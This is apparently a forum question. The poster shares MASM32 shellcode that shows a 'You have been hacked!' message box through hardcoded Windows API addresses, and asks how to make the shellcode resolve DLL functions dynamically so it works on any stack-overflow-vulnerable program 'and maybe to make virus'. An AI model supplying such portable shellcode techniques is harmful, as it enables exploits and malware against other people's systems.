I'm programming a shell code for stack buffer overflow vulnerabilities, I have learned about it and read alot of this vulnerability and finally I have the ability to exploit it and make the shells.
This is my code:
;+-+-+-+-+[ FileName: shellcode.asm ]+-+-+-+-+-+ .386 .model flat, stdcall option casemap:none ;+-+-+-+-+ Include Files +-+-+-+-+-+ include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc ;+-+-+-+-+ Include Libraries +-+-+-+-+ includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib .code main: ;|=--------------=[ shell code section ]=---------------=| push 0 ; OK button jmp _caption _rCaption: jmp _msg _rMsg: push 0 ; hWnd call DWORD PTR DS:[402034h] ; <=> call MessageBox push 0 call DWORD PTR DS:[402014h] ; <=> call ExitProcess ;|=--------------=[ shell data section ]=---------------=| _caption: call _rCaption ; <=> push offset caption caption db "ha ha",0 _msg: call _rMsg ; <=> push offset msg msg db "You have been hacked!",0 end main
Now as you can see the routines above (messagebox, and exitprocess) are static, so I must know the address of the procedures inside the target program and put it into the shell and assemble it again!! :(
Is there any way to make the shell dynamically, my point is how to <b>include the dll procedures inside the body of programs?</b>
The reason of my question is to make the shell works in any program that have the stack buffer overflow vulnerability and maybe to make virus do the same way.
Note: I don't accept the solution that make the shell takes the addresses from import data section of the target program, this is can work for the example above but don't work with shells that have different dll procedures.